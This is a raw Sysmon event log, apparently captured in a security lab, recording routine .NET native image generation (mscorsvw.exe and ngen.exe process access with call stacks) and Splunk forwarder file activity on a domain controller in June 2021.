21:05:06.614{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A202-60D3-4804-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.583{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A202-60D3-4804-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.583{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A202-60D3-4804-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.505{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A202-60D3-4704-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.473{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A202-60D3-4704-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.473{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A202-60D3-4704-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:06.411{4DB9351A-A202-60D3-4604-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a3c-0\PresentationFramework.Classic.dll2021-06-23 21:05:06.411 23542300x800000000000000021346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.333{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7843491CC5BF15F5987348006E4E8F92,SHA256=0C880941466C4654861ED6EFBBD39E1441BD58EF04032BE0502780C4F1488540,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.223{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A202-60D3-4604-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.208{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A202-60D3-4604-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.208{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A202-60D3-4604-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A202-60D3-4504-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.114{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A202-60D3-4504-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.114{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A202-60D3-4504-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:06.051{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13b8-0\PresentationFramework.AeroLite.dll2021-06-23 21:05:06.051 23542300x800000000000000021370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.926{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7463EAFB7F9F8F37F3987882112897C,SHA256=20F886EC2DB78787D5D99DCD5677EFB3D52EB1F368B20F4EC4B91629B25CCC62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.840{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4C04-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.818{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4C04-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.818{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4C04-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.676{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4B04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.630{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4B04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.630{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4B04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:07.489{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b88-0\PresentationFramework.Royale.dll2021-06-23 21:05:07.489 23542300x800000000000000021362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.489{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1389588F480FBD5FBFCD05409A09FC18,SHA256=F9B395CEB52B5F2ED9DF1D76FDA9B2A29ABDE82096F2619CC781DBD3E79C5981,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.287{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.255{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.255{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 